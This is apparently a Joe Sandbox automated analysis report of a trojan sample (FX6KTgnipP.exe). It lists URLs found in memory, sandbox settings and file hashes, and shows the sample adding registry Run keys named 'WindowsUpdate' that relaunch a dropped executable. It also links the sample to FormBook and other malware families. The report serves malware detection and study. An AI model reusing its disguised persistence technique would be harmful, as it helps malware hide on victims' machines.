                                                          https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&ocexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-oexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.msn.com/rTexplorer.exe, 00000020.00000000.3696594073.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-oexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.autoitscript.com/autoit3/JFX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000000.1685361958.0000000000405000.00000002.00000001.01000000.0000000C.sdmp, dmqiuorkt.mp2.exe, 00000012.00000002.2328145879.0000000000405000.00000002.00000001.01000000.0000000C.sdmp, dmqiuorkt.mp2.exe, 00000015.00000000.1940668034.0000000000405000.00000002.00000001.01000000.0000000C.sdmp, dmqiuorkt.mp2.exe0.7.drfalse
                                                                          		high
                                                                          https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://word.office.comexplorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfvexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://android.notify.windows.com/iOSJMexplorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://powerpoint.office.comexplorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bannexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://outlook.comexplorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://android.notify.windows.com/iOSZMexplorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-fexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-woexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://android.notify.windows.com/iOSexplorer.exe, 00000020.00000000.3699860588.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3836823624.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nationexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.yelp.comexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://www.msn.com:443/en-us/feedexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hIexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.msn.com/en-us/weather/topstories/accuweather-el-niexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://api.msn.com/v1/news/Feed/Windows?z$explorer.exe, 00000020.00000002.3833424525.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.0000000008685000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkexplorer.exe, 00000020.00000002.3830570712.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high

                                                                                                                                  World Map of Contacted IPs

                                                                                                                                  No contacted IP infos

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                  Analysis ID:1569431
                                                                                                                                  Start date and time:2024-12-05 19:01:04 +01:00
                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 12m 29s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:full
                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                  Number of analysed new started processes analysed:32
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Sample name:FX6KTgnipP.exe
                                                                                                                                  renamed because original name is a hash value
                                                                                                                                  Original Sample Name:6d414885d7f75777705948ed9a7134421d7cc2eabb4c4591b913864e8642850a.exe
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.evad.winEXE@40/50@0/0
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 95%
                                                                                                                                  • Number of executed functions: 195
                                                                                                                                  • Number of non-executed functions: 214
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                  Warnings

                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                  • VT rate limit hit for: FX6KTgnipP.exe

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  13:02:15API Interceptor1x Sleep call for process: FX6KTgnipP.exe modified
                                                                                                                                  13:03:38API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                  13:04:07API Interceptor4867854x Sleep call for process: UserAccountControlSettings.exe modified
                                                                                                                                  13:05:53API Interceptor38x Sleep call for process: explorer.exe modified
                                                                                                                                  18:02:21AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                                                                                                                                  18:02:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                                                                                                                                  18:02:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  No context

                                                                                                                                  Domains

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousOrcus, PureLog StealerBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  bmXYSTLHjA.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  tegga.htaGet hashmaliciousXmrigBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  17334181261974bf64e3aa3bbac8bf525f91f1e7e877c7dc9d79fa20f782fc960f960876a5125.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  1733418140de6eff55fb568a29814debaf3ad46ee7119730b1019aa5b47c07d232cf03fefd427.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  8WLOyt9f86.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  17334181364071403cdc067ba1fc9ab2f8f7271b4a46f441520951e9988bd247070aee405c380.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  https___files.catbox.moe_l2rczc.pif.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 13.107.246.63
                                                                                                                                  ECtxws3Hug.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  • 13.107.246.63

                                                                                                                                  ASNs

                                                                                                                                  No context

                                                                                                                                  JA3 Fingerprints

                                                                                                                                  No context

                                                                                                                                  Dropped Files

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                  C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2.exeuhbrQkYNzx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                    qPLzfnxGbj.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      ngPebbPhbp.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                        FS04dlvJrq.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          M1Y6kc9FpE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                            mJIvCBk5vF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                              lcbF0sywlU.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                1aG5DoOsAW.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                  Factura-2410-CFDI.batGet hashmaliciousUnknownBrowse
                                                                                                                                                    DGFmCcZnM0.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2uhbrQkYNzx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        qPLzfnxGbj.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                          ngPebbPhbp.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                            FS04dlvJrq.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                              M1Y6kc9FpE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                mJIvCBk5vF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                  lcbF0sywlU.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    1aG5DoOsAW.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                      Factura-2410-CFDI.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                        DGFmCcZnM0.exeGet hashmaliciousFormBookBrowse

                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_9bf63d29b93ab2a3cccbc76a32dc3553f76fd795_3225f4f5_19d21bd3-bc35-4b91-9a6d-f6b3260ea154\Report.wer

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):0.6477405974724811
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:a0Fe3yMd5k8lacsoFWC/bE6tQXIDcQvc6QcEVcw3cE/OsF+HbHsZAX/d5FMT2SlQ:b0Cy5k8QcS0BU/IjlzuiFKZ24IO8L
                                                                                                                                                                          MD5:FA2C0221134C27E7C9BCAFE2AF2E488B
                                                                                                                                                                          SHA1:ED2D6547343A039924048E52F964F71FF5B79C2B
                                                                                                                                                                          SHA-256:286B14334868B139400029C493B8ED1033C341E703BA9B76E4F20581D319856E
                                                                                                                                                                          SHA-512:D721E12845BD747B9977A3776F05A401B16395E96C94D0AB280906B606EB4DC7F2601C1429AF267D064A826955EE0F3C3BCCA5D2561633BB905A50F8630AC00C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.8.9.5.4.0.6.6.6.5.6.5.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.8.9.5.4.0.8.4.6.2.5.0.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.d.2.1.b.d.3.-.b.c.3.5.-.4.b.9.1.-.9.a.6.d.-.f.6.b.3.2.6.0.e.a.1.5.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.a.b.b.4.a.2.-.1.a.4.f.-.4.b.2.d.-.b.2.b.b.-.4.b.5.8.a.9.5.4.d.0.6.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.4.8.-.0.0.0.1.-.0.0.1.4.-.d.b.c.9.-.8.c.f.a.3.f.4.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.!.R.e.g.

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC98F.tmp.dmp

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Thu Dec 5 18:03:26 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):18890
                                                                                                                                                                          Entropy (8bit):2.0354756181850053
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:5785prpHhRtpte+MCsi7UiiV4H64dQa/zPMMMZp/8cWIkWIXTIxAMw:qjrpVpBiOs4HtdQM7MMCkoAl
                                                                                                                                                                          MD5:13012FDB5478D442041FAC575BD79827
                                                                                                                                                                          SHA1:3C271B03E620D93C06EE5D2F4AF8B5172280EED3
                                                                                                                                                                          SHA-256:E195B3AC995CDB3F56E7A466BA13AA71A47F7C7C9C52FF21D5F5D425D810922A
                                                                                                                                                                          SHA-512:1C58A7D8492934E5F92FB2DFCE627BC38D614D52D43819BD5623CABDB8706B3B0F586726960A14E28897435A5CD4F88E01C7396C10682891FE83548D6410D4A5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:MDMP..a..... .........Qg............4...............<.......d...............T.......8...........T...........0....A......................................................................................................eJ......L.......GenuineIntel............T.......H.....Qg............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC9DE.tmp.WERInternalMetadata.xml

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):8324
                                                                                                                                                                          Entropy (8bit):3.6936330466973586
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:R6l7wVeJCQ6Biw6YwS6tpGgmfkGprX89buFsfIK6m:R6lXJF6Bt6Yd6ygmfkTuefIO
                                                                                                                                                                          MD5:A812FA474B5B28110ECFC1EB71AA799C
                                                                                                                                                                          SHA1:8E0C57D440E3A57E2F48DD62FC016DF7BC0CD1BD
                                                                                                                                                                          SHA-256:22FA02DB764E589C4A0B30AB998F7EB3465B7A7C1D4DE3BDC800AC2B0751D5F0
                                                                                                                                                                          SHA-512:B43546B54F4B852ADD3170F4537E1489BEF268E791D78D7650B05DA7213494679D50F8F1AEBCE3FBB9E87A8D35ED116F4242146736F3B044315F878EDA0EDA23
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.5.6.<./.P.i.

                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA1D.tmp.xml

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4736
                                                                                                                                                                          Entropy (8bit):4.440981623082431
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:48:cvIwWl8zsZqJg77aI9RLSWpW8VY9Ym8M4JbrFgKo+q8vRJmDIxd:uIjfCI7HLz7VFJ6KoKHmDIxd
                                                                                                                                                                          MD5:E0CE4C9A991D8F2F08735CBEF19712A2
                                                                                                                                                                          SHA1:A55043E9DCD349FA8696CC68BAC90DE66635AE3C
                                                                                                                                                                          SHA-256:3D71AB0A8B06B8AE8C8FA7CCF256BB6C0D64DC953FC1962FB50580046A1513B6
                                                                                                                                                                          SHA-512:E87DC096CEB50D5F4DD420C28C08ED6DC87A69CB373D4E5B331BBAAD6B8077E5F9C85B7C8D88CFFE31EC211D072DE6A6F318132E9050C87E4B540E15A7657DA0
                                                                                                                                                                          Malicious:false
